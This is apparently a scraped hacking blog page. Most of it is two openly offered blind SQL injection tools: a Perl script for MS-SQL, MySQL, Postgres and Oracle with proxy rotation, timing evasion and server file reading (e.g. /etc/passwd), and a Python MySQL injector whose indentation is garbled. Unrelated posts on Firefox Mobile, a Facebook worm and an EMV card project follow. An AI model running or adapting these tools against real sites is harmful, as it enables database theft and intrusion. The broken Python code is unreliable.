Deadc0de Blind SQL Injection <= to my honey JID :p

I call this hacker_is_death.pl lol hahahahha
this is a simple c0de to try blind SQL Injection and Test vulnerable on the web target :)

dedicated to "Syarifah Sarah Soraya Anajani Haniah Alkaaff" a.k.a "DJ Cleo"
keep play the music honey :)

#!/usr/bin/env perl
# Blind SQL Injection
# Author : D4wFl1N
# thx to : r3d3 deadc0de, black deadc0de, mozart deadc0de, jimmy deadc0de a.k.a jimmy romanticdevil
# and y0u
# TODO:
# [ ] Rip more c0de from others.
#  ______      _____ _             ___          
# |  ____|    / ____| |           / _ \         
# | |__ _   _| |    | | __  _   _| | | |_   _   
# |  __| | | | |    | |/ / | | | | | | | | | |  
# | |  | |_| | |____|   <  | |_| | |_| | |_| |  
# |_|   \__,_|\_____|_|\_\  \__, |\___/ \__,_|  
#                           __/ |              
#                          |___/                
#

use LWP::UserAgent;
use Getopt::Long;
use IO::Handle;
use strict;
use threads;
use threads::shared;
use Time::HiRes qw( usleep);

$| = 1;


###############################################################################
my $default_debug = 0;
my $default_length = 32;
my $default_method = "GET";
my $default_time = 0;
my $version = "1.0";
my $default_useragent = "deadc0de $version";
my $default_sql = "(select \@\@version)";
###############################################################################


$| = 1;

my ($args, $solution);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my ($head, $tail, $high);
my $hits = 0;
my $amatch = 0;
my ($ua,$req);
my $furl;

###############################################################################
# Define GetOpt:
my ($url, $type, $database, $sql, $time, $rtime, $match, $uagent, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent);
my ($start, $length, $method, $cookie, $blind);
my ($help, $get);
my ($ascii, $binary);

my $options = GetOptions (
  'help!'            => \$help,
  'url=s'            => \$url,
  'database=s'         => \$database,
  'type=s'             => \$type,   
  'get=s'            => \$get,
  'sql=s'            => \$sql,
  'blind=s'          => \$blind,
  'match=s'          => \$match,
  'start=s'          => \$start,
  'length=s'         => \$length,
  'method=s'         => \$method,
  'uagent=s'         => \$uagent,
  'ruagent=s'         => \$ruagent,
  'cookie=s'         => \$cookie,
  'proxy=s'          => \$proxy,
  'proxy_user=s'     => \$proxy_user,
  'proxy_pass=s'     => \$proxy_pass,
  'rproxy=s'         => \$rproxy,
  'debug!'           => \$debug,
  'binary!'           =>\$binary,
  'ascii!'           => \$ascii,
  'rtime=s'          => \$rtime,
  'time=i'           => \$time
  );

&help unless ($url);
&help if $help eq 1;

#########################################################################
# Default Options.
$uagent         ||= $default_useragent;
$debug          ||= $default_debug;
$length         ||= $default_length;
$solution       ||= $start;
$method         ||= $default_method;
$sql            ||= $default_sql;
$time           ||= $default_time;


&createlwp();
&parseurl();

if ( ! defined($blind)) {
        $lastvar = $varsb[$#varsb];
        $lastval = $vars{$lastvar};
} else {
        $lastvar = $blind;
        $lastval = $vars{$blind};
}

if (! defined($type)) {
    $type=0;
}

if (! defined($database)) {
    $database=0
}

if (defined($cookie)) { &cookie() }
if (!$match) {
    print "\nTrying to find a match string...\n" if $debug == 1;
    $amatch = "1";
    $match = fmatch("$url"," AND 1=");
    if ($match eq "no vulnerable")
        {
        print "\nNo vuln: 2nd..\n" if $debug ==1;
        $match = fmatch("$url"," AND 1='");
        #$head = "\"";
        #$tail = " AND 1=\"1";
    };
    if ($match eq "no vulnerable") {
        print "Not vulnerable \n\n If you know its vulnerable supply the '-match' string\n";
        exit 0;
    }
}
&banner();
&httpintro();



( ! $get) ? sqlget() : fileget();

my @byte = ();
my $wait_me;

sub getbyte {
   my $sql = $_[0];
   my $bit="";
   my @thread_count = ();
   my $c = 8;
   my $i = 0;
   $high = 128 unless $ascii;#) ? 128 : { 64; $byte[0] = 0; };
   $wait_me = 0;

   share($wait_me);
   share (@byte);

   if ($ascii) {
     $byte[0] = 0;
     $high = 64;
   }
   for ($bit=1;$bit<=$high;$bit*=2) {
# launch thread ->
    $thread_count[$i] = threads->create(\&launch_thread ,$sql, $bit, $c);
    $thread_count[$i]->detach;
    $c--;
   }

   while ($wait_me <= 7) {
    usleep(50);
    #sleep(1);# if !$dontsleep;
   }

   my $str = join("",@byte);
   #print "\nSTR: $str\n";
   return pack("B*","$str");

}

sub launch_thread {
    my ($sql, $bit, $c) = @_;
    my $val;   
    my $and="%26";
     if (lc($method) eq "post"){
     $and="&";
     }
     ###------------MS-SQL BLOCK STARTS HERE---------------------###

if ($database==0) {


#print "I am here";
        if ($url =~ /'$/) {
      ##   $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
 if ($type==1)
                      {
                         $val = "$head and (select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end )=1-- $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
                      }
                   } 

    }
                    else{
                       if ($type==1)
                      {
                         $val = "$head and (select case when ((ASCII($sql) $and $bit) =0)then 1 else 1/0 end)=1 $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ASCII($sql) $and $bit)=0 $tail";
                      }
                   } 
              
                  }


                }


     ###------------MS-SQL BLOCK STOPS HERE---------------------###
     ###----------POSTGRES BLOCK STARTS HERE---------------------###

if ($database==2) {



        if ($url =~ /'$/) {
   
 if ($type==1)
   
                      {
                         $val = "$head and (case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end)=1-- $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
                      }
                   } 

    }
                    else{
                       if ($type==1)
                      {
                         $val = "$head and (case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end)=1 $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ASCII($sql) $and $bit)=0 $tail";
                      }
                   } 
              
                  }


                }
###----------POSTGRES BLOCK STOPS HERE---------------------###
###----------ORACLE BLOCK STARTS---------------------------####
     if ($database==3) {
   
if ($url =~ /'$/) {
          if ($type==1)
   
                      {
                         $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1-- $tail";
                      }
              else {    if($type==0)
                      {      
                         $val = "$head and BITAND((ASCII($sql)), $bit)=0-- $tail";                      }
                   } 

    }
                    else{
                       if ($type==1)
                      {
                         $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1 $tail";
                      }
              else {    if($type==0)
                      {      
               $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1 $tail";
                      }
                   } 
              
                  }
                        }


###----------ORACLE BLOCK STOPS HERE---------------------------####
###------------MY-SQL BLOCK STARTS HERE---------------------###

   
    if ($database==1) {
   
   
    if ($url =~ /'$/)        {
          if ($type==1)
                      {
                         $val = "$head and (select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end)=1 $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ord($sql) $and $bit)=0 $tail";
                      }
                   } 
# or one may also use #
                            }
             
                  else
                   
                {
                      if ($type==1)
                      {
                         $val = "$head and (select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end)=1 $tail";
                      }
              else {if($type==0)
                      {      
              $val = "$head and (ord($sql) $and $bit)=0 $tail";
                      }
                    } 
               

                }
###-----------MySQL BLOCK ENDS HERE-------------------###




 }
                  #print "VAL[$c] $val\n";
        if (lc($method) eq "post") {
                $vars{$lastvar} = $lastval . $val;

        }
        $furl = $url;
        $furl =~ s/($lastvar=$lastval)/$1$val/;
        &createlwp if $rproxy || $ruagent;
        my $html=fetch("$furl");
        $hits++;
        foreach (split(/\n/,$html)) {
        lock @byte;
                if (/\Q$match\E/) {
                    $byte[$c]=0;
                    last;
                 } else { $byte[$c] = 1; }
        }
    lock $wait_me;
    threads->yield();
    $wait_me++;
}

sub sqlget                                    {


    ##--ms-sqlblock--##




if ($database==0 ) {

my ($fsize,$i,$s);
        $s = "SUBSTRING(cast(len(len(($sql)))as varchar),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "SUBSTRING(cast(len(($sql))as varchar),$i,1)";
        $fsize.=getbyte($s);
    }

    #print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "substring(cast(($sql)as varchar),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
     }


}

    ##--ms-sql block-finish--##
    ##---oracle block starts--##
if ($database==3) {

    my ($fsize,$i,$s);
        $s = "SUBSTR(cast(length(length(($sql)))as varchar(100)),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "SUBSTR(cast(length(($sql))as varchar(100)),$i,1)";
        $fsize.=getbyte($s);
    }

    print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "substr(cast(($sql)as varchar(100)),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
     }
}


    ##---oracle block finish--##
##--postgres block----##
if ($database==2) {
my ($fsize,$i,$s);
   
        $s = "SUBSTR(cast(length(length(($sql)))as varchar),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "SUBSTR(cast(length(($sql))as varchar),$i,1)";
        $fsize.=getbyte($s);
    }

    print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
       
        $s = "substr(cast(($sql)as varchar),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
     }


}

    ##--postgres block-finish--##
    ##-mysql block--##
    if ($database==1) {
        my ($fsize,$i,$s);
        $s = "mid(length(length(($sql))),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "mid(length(($sql)),$i,1)";
        $fsize.=getbyte($s);
    }
   
    #print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "mid(($sql),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
     }
}

##-mysql-block-##
                                        }

#---------------end-------------------#
sub fileget {
    my ($lget,$fstr);
    if ($get =~ m/.*\/(.*)/) {
        $lget = $1; }
        $fstr = "0x".unpack("H*","$get");
    if ($get =~ m/.*\\(.*)/) {
        $lget = $1;
        $fstr = "\"$get\"";
    }

    my $rsize = $start + 1;
    if (-e "$lget" && ! $start) {
        $rsize = -s "$lget";
        print "Error: file ./$lget exists.\n";
        print "You can erase or resume it with: -start $rsize\n";
        exit 1
    }
    my ($i,$fsize);
    $sql = "mid(length(length(load_file($fstr))),1,1)";
    my $lng .= getbyte($sql);
    for ($i=1;$i<=$lng;$i++) {
        my $find = 0;
        $sql = "mid(length(load_file($fstr)),$i,1)";
        $fsize.=getbyte($sql);
    }

    if ($fsize < "1") { print "Error: file not found, no permissions or ... who knows\n"; exit 1 }
    $length = $fsize. "bytes";
    # starting ..
    $sql = "load_file($get)";

    &bsqlintro();
    # Get file
    #print "---> $lget";
    open FILE, ">>$lget";
    FILE->autoflush(1);
    print "\n--- BEGIN ---\n";
    my ($i,$b,$fcontent);
    $rsize = 1 if $rsize < 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        my $find = 0;
        my ($furl, $b_start, $b_end, $z);
        $sql = "mid(load_file($fstr),$i,1)";
        $fcontent=getbyte($sql);
        print $fcontent;
        print FILE "$fcontent";
     }
    print "\n--- END ---\n";
        close FILE;
    $solution = "success";
    $sql = "$get";
}



&result();



#########################################################################
sub httpintro {
    my ($strcookie, $strproxy, $struagent, $strtime, $i);
    print "--[ http options ]"; print "-"x62; print "\n";
    printf ("%12s %-8s %11s %-20s\n","schema:",$scheme,"host:",$authority);
    if ($ruagent) { $struagent="rnd.file:$ruagent" } else { $struagent = $uagent }
    printf ("%12s %-8s %11s %-20s\n","method:",uc($method),"useragent:",$struagent);
    printf ("%12s %-50s\n","path:", $path);
    foreach (keys %vars) {
        $i++;
        printf ("%12s %-15s = %-40s\n","arg[$i]:",$_,$vars{$_});
    }
    if (! $cookie) { $strcookie="(null)" } else { $strcookie = $cookie; }
    printf ("%12s %-50s\n","cookies:",$strcookie);
    if (! $proxy && !$rproxy) { $strproxy="(null)" } else { $strproxy = $proxy; }
    if ($rproxy) { $strproxy = "rnd.file:$rproxy" }
    printf ("%12s %-50s\n","proxy_host:",$strproxy);
    if (! $proxy_user) { $strproxy="(null)" } else { $strproxy = $proxy_user; }
     # timing
    if (! $time && !$rtime) { $strtime="0sec (default)" }
    if ( $time == 0) { $strtime="0 sec (default)" }
    if ( $time == 1) { $strtime="15 secs" }
    if ( $time == 2) { $strtime="5 mins" }
    if ($rtime) { $strtime = "rnd.time:$rtime" }
    printf ("%12s %-50s\n","time:",$strtime);
    printf("\n\nFinding Length of SQL Query....\n");
}

sub bsqlintro {
    my ($strstart, $strblind, $strlen, $strmatch, $strsql);
    print "\n--[ blind sql injection options ]"; print "-"x47; print "\n";
    if (! $start) { $strstart = "(null)"; } else { $strstart = $start; }
    if (! $blind) { $strblind = "(last) $lastvar"; } else { $strblind = $blind; }
    printf ("%12s %-15s %11s %-20s\n","blind:",$strblind,"start:",$strstart);
    printf ("%12s %-15s %11s %-20s\n","database:",$database,"type:",$type);
    if ($length eq $default_length) { $strlen = "$length (default)" } else { $strlen = $length; }
    if ($sql eq $default_sql) { $strsql = "$sql (default)"; } else { $strsql = $sql; }
    printf ("%12s %-15s %11s %-20s\n","length:",$strlen,"sql:",$strsql);
    if ($amatch eq 1) { $strmatch = "auto match:(!!THIS MAY BE WRONG!!)" } else { $strmatch = "match:"; }
    #printf ("%12s %-60s\n","$strmatch",$match);
    print " $strmatch $match\n";
    print "-"x80; print "\n\n";
    printf "\n Getting Data...\n";
}

#########################################################################

sub createlwp {
    my $proxyc;
    &getproxy;
    &getuagent if $ruagent;
    LWP::Debug::level('+') if $debug gt 3;
    $ua = new LWP::UserAgent(
        cookie_jar=> { file => "$$.cookie" });
    $ua->agent("$uagent");
    if (defined($proxy_user) && defined($proxy_pass)) {
        my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
        $proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
        $proxyc = $pscheme."://".$proxy_user.":".$proxy_pass."@".$pauthority;
    } else { $proxyc = $proxy; }
   
    $ua->proxy(['http'] => $proxyc) if $proxy;
    undef $proxy if $rproxy;
    undef $uagent if $ruagent;
}   

sub cookie {
    # Cookies check
    if ($cookie || $cookie =~ /; /) {
        foreach my $c (split /;/, $cookie) {
            my ($a,$b) = split /=/, $c;
            if ( ! $a || ! $b ) { die "Wrong cookie value. Use -h for help\n"; }
        }
    }
}

sub parseurl {
 ###############################################################################
 # Official Regexp to parse URI. Thank you somebody.
    ($scheme, $authority, $path, $query, $fragment) =
        $url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
    # Parse args of URI into %vars and @varsb.
    foreach my $varval (split /&/, $query) {
        my ($var, $val) = split /=/, $varval;
        $vars{$var} = $val;
        push(@varsb, $var);
    }
}


#########################################################################
# Show options at running:
sub banner {
print "\n Are you ready to r0ck ? \n";
print " \n O.K let's play the music DJ_Cle0 ^_^ \n";
}


#########################################################################
# Get differences in HTML
sub fmatch {
 my ($ok,$rtrn);
 my ($furla, $furlb,$quote) = ($_[0], $_[0],$_[1]);
 my ($html_a, $html_b);
 if (lc($method) eq "get") {
    $furla =~ s/($lastvar=$lastval)/$1 ${quote}1/;
    $furlb =~ s/($lastvar=$lastval)/$1 ${quote}0/;
     $html_a = fetch("$furla");
    $html_b = fetch("$furlb");
 } elsif (lc($method) eq "post") {
   $vars{$lastvar} = $lastval . " ${quote}1";
   $html_a = fetch("$furla");
   $vars{$lastvar} = $lastval . " ${quote}0";
   $html_b = fetch("$furla");
   $vars{$lastvar} = $lastval;
 }


 #print "$html_a";
 #print "$html_b";

 if ($html_a eq $html_b) {
  $rtrn = "no vulnerable";
  return $rtrn;
 }


 my @h_a = split(/\n/,$html_a);
 my @h_b = split(/\n/,$html_b);
 foreach my $a (@h_a) {
    $ok = 0;
    if ($a =~ /\w/) {
           foreach (@h_b) {
            if ($a eq $_) {$ok = 1; }
        }
    } else { $ok = 1; }
   $rtrn = $a;
   last if $ok ne 1;
 }
 return $rtrn;
}


#########################################################################
# Fetch HTML from WWW
sub fetch {
    #print "fetch: $_[0]\n";
    my $secs;
    if ($time == 0) { $secs = 0 }
    elsif ($time == 1) { $secs = 15 }
    elsif ($time == 2) { $secs = 300 }
    if ($rtime =~ /\d*-\d*/ && $time == 0) {
        my ($l,$p) = $rtime =~ m/(\d+-\d+)/;
        srand; $secs = int(rand($p-$l+1))+$l;
    } elsif ($rtime =~ /\d*-\d*/ && $time != 0) {
        print "You can't run with -time and -rtime. See -help.\n";
        exit 1;
    }
    sleep $secs;
   
    my $res;
    if (lc($method) eq "get") {
        my $fetch = $_[0];
        if ($cookie) {
            $res = $ua->get("$fetch", Cookie => "$cookie");
        } elsif (!$cookie) {
            $res = $ua->get("$fetch");
        }
    } elsif (lc($method) eq "post") {
        my($s, $a, $p, $q, $f) =
          $url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
        my $fetch = "$s://$a".$p;
        if ($cookie) {
            $res = $ua->post("$fetch",\%vars, Cookie => "$cookie");
        } elsif (!$cookie) {
            $res = $ua->post("$fetch",\%vars);
        }
    } else {
        die "Wrong httpd method. Use -h for help\n";
    }
    my $html = $res->content();
    return $html;
}


sub getproxy {
    if ($rproxy && $proxy !~ /http/) {
        my @lproxy;
        open PROXY, $rproxy or die "Can't open file: $rproxy\n";
        while() { push(@lproxy,$_) if ! /^#/ }
        close PROXY;
        srand; my $ind = rand @lproxy;
        $proxy = $lproxy[$ind];
    } elsif ($rproxy && $proxy =~ /http/)  {
        print "You can't run with -proxy and -rproxy. See -help.\n";
        exit 1;
    }
}

sub getuagent {
        my @uproxy;
        open UAGENT, $ruagent or die "Can't open file: $ruagent\n";
        while() { push(@uproxy,$_) if ! /^#/ }
        close UAGENT;
        srand; my $ind = rand @uproxy;
        $uagent = $uproxy[$ind];
        chop($uagent);
}

sub result {
    print "\r results:\n" ." $sql = $solution\n" if length($solution) > 0;
    #print " total hits: $hits\n";
    my $blah= length($solution);
    if ($blah<2)
    {print "\n !!!!!!Errrrrrrr.. something is not quite right.. see below!!!!!\n";
     print "-------------------------------------------------------";
     print "\n1 In a string based injection, vulnerable parameter must end with single quote(')\n\t eg. some_file.php?id=foo'";
     print "\n2 AND don't forget to provide me a unique true response with -match";
     print "\n3 Also Check that the SQL Query you supplied returns only one row\n";
     print "-------------------------------------------------------\n\n\n";
    }
}

sub help {
    &banner();
        print " ---------------------usage:-------------------------------------------\n";
    print"\nInteger based Injection-->$0 - url http://www.host.com/path/script.php?foo=1000 [options]\n ";
    print "\nString Based Injection-->$0 - url http://www.host.com/path/script.php?foo=bar' [options]\n  ";
    print "\n ------------------------------------options:--------------------------\n";
    print " -sql:\t\tvalid SQL syntax to get; version(), database(),\n";
    print "\t\t\query like-->(select  table_name from inforamtion_schema.tables limit 1 offset 0)\n";
    print " -get: \t\tIf MySQL user is root, supply word readable file name\n";
    print " -blind:\tparameter to inject sql. Default is last value of url\n";
    print " -match:\t*RECOMMENDED* string to match in valid query, Default is try to get auto\n";
    print " -start:\tif you know the beginning of the string, use it.\n";
    print " -length:\tmaximum length of value. Default is $default_length.\n";
    print " -time:\t\ttimer options:\n";
    print " \t0:\tdont wait. Default option.\n";
    print " \t1:\twait 15 seconds\n";
    print " \t2:\twait 5 minutes\n";
    print " -type:\t\tType of injection:\n";
    print " \t0:\tType 0 (default) is blind injection based on True and False responses\n";
    print " \t1:\tType 1 is blind injection based on True and Error responses\n";
    print " -database:\tBackend database:\n";
    print " \t0:\tMS-SQL (Default)\n";
    print " \t1:\tMYSQL\n";
    print " \t2:\tPOSTGRES\n";
    print " \t3:\tORACLE\n";
    print " -rtime:\twait random seconds, for example: \"10-20\".\n";
    print " -method:\thttp method to use; get or post. Default is $default_method.\n";
    print " -uagent:\thttp UserAgent header to use. Default is $default_useragent\n";
    print " -ruagent:\tfile with random http UserAgent header to use.\n";
    print " -cookie:\thttp cookie header to use\n";
    print " -rproxy:\tuse random http proxy from file list.\n";
    print " -proxy:\tuse proxy http. Syntax: -proxy=http://proxy:port/\n";
    print " -proxy_user:\tproxy http user\n";
    print " -proxy_pass:\tproxy http password\n";
    print "\n---------------------------- examples:-------------------------------\n";
    print "\n perl $0 -url http://www.target.com/blah.php?u=5 -blind u -sql \"select table_name from imformation_schema.tables limit 1 offset 0\" -database 1 -type 1\n";
    print "\n perl $0 -url http://www.target.com/bug.php?r=514&p=foo' -method post -get \"/etc/passwd\" -match \"foo\"\n";
    exit(1);
}

happy c0ding :)

Baca Selengkapnya... Deadc0de Blind SQL Injection <= to my honey JID :p

MySQL Blind SQL injector

This c0de is name deadc0de_blindSQL.py

# SQLInjector   -  MySQL Blind SQL injector
# by Deadc0de - Team
# known issues;
# uses md5 for page comparison rather than searching for a string.   This can be a problem if the page includes dynamic banner ads. 
# M,N and 0-9 period and comma are not representative of the actual correct frequent character set
# lettertable() function needs be expanded but there is a performance hit the bigger it gets

import md5, sys, urllib2, sys
import pdb

def lettertable(letter):
   return {
           "q":"uaqoisvretwybnhlxmfpzcdjgk_1234567890.,",
           "w":"ahieonsrldwyfktubmpcgzvjqx_1234567890.,",
           "e":"rndsaletcmvyipfxwgoubqhkzj_1234567890.,",
           "r":"eoiastydnmrugkclvpfbhwqzjx_1234567890.,",
           "t":"hoeiartsuylwmcnfpzbgdjkxvq_1234567890.,",
           "y":"oesitamrlnpbwdchfgukzvxjyq_1234567890.,",
           "u":"trsnlgpceimadbfoxkvyzwhjuq_1234567890.,",
           "i":"ntscolmedrgvfabpkzxuijqhwy_1234567890.,",
           "o":"nurfmtwolspvdkcibaeygjhxzq_1234567890.,",
           "p":"eroaliputhsygmwbfdknczjvqx_1234567890.,",
           "l":"eliayodusftkvmpwrcbgnhzqxj_1234567890.,",
           "k":"einslayowfumrhtkbgdcvpjzqx_1234567890.,",
           "j":"euoainkdlfsvztgprhycmjxwbq_1234567890.,",
           "h":"eaioturysnmlbfwdchkvqpgzjx_1234567890.,",
           "g":"ehroaiulsngtymdwbfpzkxcvjq_1234567890.,",
           "f":"oeriafutlysdngmwcphjkbzvqx_1234567890.,",
           "d":"eioasruydlgnvmwfhjtcbkpqzx_1234567890.,",
           "s":"tehiosaupclmkwynfbqdgrvjzx_1234567890.,",
           "a":"ntrsldicymvgbpkuwfehzaxjoq_1234567890.,",
           "z":"eiaozulywhmtvbrsgkcnpdjfqx_1234567890.,",
           "x":"ptcieaxhvouqlyfwbmsdgnzrkj_1234567890.,",
           "c":"oheatikrlucysqdfnzpmgxbwvj_1234567890.,",
           "v":"eiaoyrunlsvdptjgkhcmbfwzxq_1234567890.,",
           "b":"euloyaristbjmdvnhwckgpfzxq_1234567890.,",
           "m":"tashwiobmcfdplnergyuvkjqzx_1234567890.,",
           "n":"tashwiobmcfdplnergyuvkjqzx_1234567890.,",
           "1":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "2":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "3":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "4":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "5":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "6":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "7":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "8":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "9":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "0":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           ".":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           ",":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "_":"tashwiobmcfdplnergyuvkjqzx_1234567890.,-",
    }[letter]

def md5sum(value):
    hasher = md5.new()
    hasher.update(value)
    return hasher.hexdigest()

def fetch_page(url):
    request = urllib2.Request(url)
    requestor = urllib2.build_opener()
    request.addheaders = [('User-agent', 'Mozilla/5.0')]
    content = requestor.open(request).read()
    return content

def hsbrute(targeturl):
    #pdb.set_trace()
    urlstart, sqlquery, urlend = targeturl.split("^")
    truehash = md5sum(fetch_page(urlstart + "/**/and/**/1=1/**/"+urlend))
    falsehash = md5sum(fetch_page(urlstart + "/**/and/**/1=0/**/"+urlend))
    if falsehash==truehash:
     print "Not Injectable.  Check this URL with a browser (and try 1=0)."+urlstart + "/**/and/**/1=1/**/"+urlend
     sys.exit(1)
    global attemptcounter
    ret_str = []
    last_ltr = ""
    element_found=0
    i=-1
    while not element_found:
      i += 1
      b_arr = "tashwiobmcfdplnergyuvkjqzx_1234567890"
      if last_ltr :
        b_arr=lettertable(last_ltr)
      for j in range(len(b_arr)):
       brute = b_arr[j]
       querystring = urlstart+"/**/and/**/lower(mid("+sqlquery+","+str(i+1)+",1))=char("+ str(ord(brute)) +")/**/"+urlend
    attemptcounter += 1
#print querystring
if md5sum(fetch_page(querystring))==truehash:
#print "is true"
    ret_str.append(b_arr[j])
    print "".join(ret_str[:])
    last_ltr=b_arr[j]
#print "is false"
if j == len(b_arr)-1 :
    print "end of word found"
    element_found=1
def printhelp():
  print """Here is your help.
python sqlinjector.py  http://www.urltotarget.com/sqlinjectable.php?vulnerable=target^sql statement here^restoftheURL=value
Example -t targetdomain.com -c "./sqlmap -u {url} --cookie: {cookies}"
"""

if "-h" in sys.argv:
  printhelp()
  sys.exit(2)


target="http://testphp.vulnweb.com/listproducts.php?cat=1^database()^#"
if sys.argv[1]:
 target = sys.argv[1]
current=0
attemptcounter=0
print "Found target " + "".join(hsbrute(target)) + " in " + str(attemptcounter) + " guesses."

Baca Selengkapnya... MySQL Blind SQL injector

Firefox Mobile – Fastest Browser For Andriod and Nokia N900

 

Firefox Mobile freeware browser for andriod mobile ,Firefox bringing together all kinds features to make mobile browsing better.Firefox protects your mobile from virus, spy-ware, Trojan, it give warning about attacking site, tells you why it isn’t safe to use.Firefox vary fast browser and better performance, so many add-ons available for Firefox ,you can change themes for ur browser, and its multi tab browser, One click on the star icon at the end of the location bar bookmarks a site. Inbuilt pop-up blocker and download manager available , download fast Firefox mobile browser now.

Features:
Security & Privacy
High Performance
Greater Personalization
Higher Productivity
Touch Friendly Interface
Universal Access
Download Firefox to Your Mobile, Now available for Android and the Nokia N900

Android
DOWNLOAD NOW ->for android open your mobile default browser type http://firefox.com/m/beta  and download.

Nokia N900
DOWNLOAD NOW

Baca Selengkapnya... Firefox Mobile – Fastest Browser For Andriod and Nokia N900

Facebook virus spreads via photo album chat messages

A new social networking worm in the vein of Koobface is currently doing the rounds.
A Naked Security reader, George, who had been exposed to it on Facebook reported it to us - unlike the majority of Facebook scams we report, this one actively infects your computer with malware instead of simply tricking you into taking surveys and passing on messages to other users.

The link in his Facebook chat from a friend pointed to an app.facebook.com/CENSORED link. Typically when you go to a Facebook app page it prompts you to add the application and grant it permission to post on your behalf or read your profile data. The scary part about this one is that it immediately prompts you to download a "FacebookPhotos#####.exe" file with no prompting or clicking required.

 

The screen reads "Photo has been moved. This photo has been moved to other location. To view this photo click View Photo." If your computer has not already downloaded the malware, the "View Photo" button will download the virus for you. 

It is really unfortunate that Facebook scams are moving back towards spreading malware. Fortunately, users of Sophos Anti-Virus had proactive protection from this threat with both our HIPS and suspicious file detection technologies; this particular strain is now identified by Sophos as W32/Palevo-BB.

The good news is that even as I was writing this article, Facebook removed the malicious application from its service. But there are probably many more applications like this one making the rounds, so, as always, beware of unusual messages from friends whether they are in email, on their walls, or in an instant message.

If you're a Facebook user, I invite you to join our Facebook page, where we post all the latest security news and threats you need to watch out for. We also have a Facebook privacy guide explaining how to navigate the privacy settings, with recommended settings to control your profile.

For those of you who need to educate your users on how to safely use social media sites, you can download our free social media education toolkit.

Baca Selengkapnya... Facebook virus spreads via photo album chat messages

Smart Card Detective (SCD)

Introduction
Many banks across USA, Europe, and Asia have introduced a new payment system, EMV, also known as Chip and PIN. EMV is a complex standard that defines the protocol used between a point of sale terminal and a smartcard. I provide a general understanding of EMV and details of the parts related to my project in the next chapter.

In a normal payment scenario (e.g. purchasing food at a supermarket) the terminal is owned by the supermarket and the smartcard is owned by the issuer bank. Thus the card user has no control over the transaction entities. In this scenario it is possible for someone to tamper with the terminal such that the amount shown on the display is higher than the amount requested to the card. The user will confidently enter the PIN and authorize the transaction.

Financial fraud in the UK has not decreased over the last years, even after Chip and PIN has been introduced. According to APACS [3] the overall level of frauds has remained relatively the same, even if the level of particular types of fraud has changed. Murdoch et al. [22] suggest that EMV has simply moved fraud, but not eliminated it. Therefore the discovery of vulnerabilities and the development of solutions against financial fraud remains an important need.

It was the main goal of this project to create a man-in-the-middle device, called Smart Card Detective (SCD), that would be able to prevent the attack described above. Such a device would have to intercept the communication between a card and a terminal, provide the user with the ability to observe the amount requested by the terminal, and then continue or reject the transaction based on the user decision.

